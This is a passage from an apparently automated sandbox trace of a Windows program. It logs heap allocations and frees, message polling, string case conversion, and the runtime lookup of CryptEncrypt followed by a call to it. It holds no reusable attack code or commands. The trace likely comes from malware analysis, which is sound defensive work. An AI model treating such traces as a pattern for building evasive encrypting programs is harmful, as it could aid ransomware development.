dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.317] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.318] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0266.318] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.318] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.319] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.319] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.322] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.322] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0266.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0266.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.327] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0266.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.329] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.331] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0266.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.336] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa080, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.338] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0266.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0266.339] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x44ea, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x44f0) returned 1 [0266.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 